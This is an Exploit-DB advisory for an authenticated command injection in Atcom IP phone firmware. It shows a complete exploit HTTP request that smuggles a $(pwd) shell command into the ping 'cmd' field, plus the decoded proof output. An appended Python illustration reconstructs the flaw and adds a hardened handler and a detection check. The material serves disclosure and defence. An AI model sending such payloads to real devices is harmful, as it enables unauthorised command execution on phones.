[remote] Atcom 2.7.x.x - Authenticated Command Injection
source link: https://www.exploit-db.com/exploits/51742
# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection
# Google Dork: N/A
# Date: 07/09/2023
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.atcom.cn/
# Software Link: https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html
# Version: All versions above 2.7.x.x
# Tested on: Kali Linux
Exploit Request:
POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1
Host: {TARGET_IP}
User-Agent: polar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Authorization: Digest username="admin", realm="IP Phone Web Configuration", nonce="value_here", uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping", response="value_here", qop=auth, nc=value_here, cnonce="value_here"

cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping
Response:
{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}
The value of "ping_cmd_result" is base64-encoded. Decoding it reveals the output of the injected command (the shell expanded $(pwd) and appended the working directory to the ping target), as shown below:
ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'
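Added illustration (not part of the advisory, and not the vendor's CGI code): a hypothetical reconstruction of the flawed pattern next to a hardened handler that accepts only a literal IP address and runs ping as an argv list with no shell, plus a decoder for the base64 "ping_cmd_result" field and a check a proxy or WAF could apply to the POST body. The ipv4_ipv6 mapping (0 = IPv4, 1 = IPv6) is assumed from the request above; the sample body and response are constructed from the advisory.

```python
import base64
import ipaddress
import json
from urllib.parse import parse_qs

# Constructed from the advisory's request body and response (not a live capture).
SAMPLE_BODY = "cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping"
SAMPLE_RESPONSE = ('{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9s'
                   'aWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}')


def build_ping_command_unsafe(body: str) -> str:
    """Hypothetical reconstruction of the flawed pattern: the cmd parameter is
    pasted into a shell command line, so $(...) is expanded by the shell."""
    cmd = parse_qs(body, keep_blank_values=True).get("cmd", [""])[0]
    return f"ping -c 1 {cmd}"          # string that would go to system()/popen()


def build_ping_argv(body: str) -> list:
    """Hardened form: accept only a literal IP address of the requested family
    and return an argv list for subprocess.run(argv), so no shell is involved.
    ipv4_ipv6=0 -> IPv4, 1 -> IPv6 is an assumption consistent with the
    advisory's request, not vendor documentation."""
    params = parse_qs(body, keep_blank_values=True)
    cmd = params.get("cmd", [""])[0]
    family = params.get("ipv4_ipv6", ["0"])[0]
    addr = ipaddress.ip_address(cmd)    # ValueError for anything but a literal
    if (family == "0") != (addr.version == 4):
        raise ValueError("address family does not match ipv4_ipv6")
    return ["ping", "-c", "1", str(addr)]


def decode_ping_result(response_json: str) -> str:
    """Decode the base64 'ping_cmd_result' field the CGI returns; this is how
    the advisory reads back the output of the injected command."""
    return base64.b64decode(json.loads(response_json)["ping_cmd_result"]).decode()


def is_injection_attempt(body: str) -> bool:
    """Detection helper for a proxy/WAF that sees the POST body: True when the
    cmd parameter is not a bare IP literal (covers $(..), backticks, ;, |)."""
    try:
        build_ping_argv(body)
        return False
    except ValueError:
        return True
```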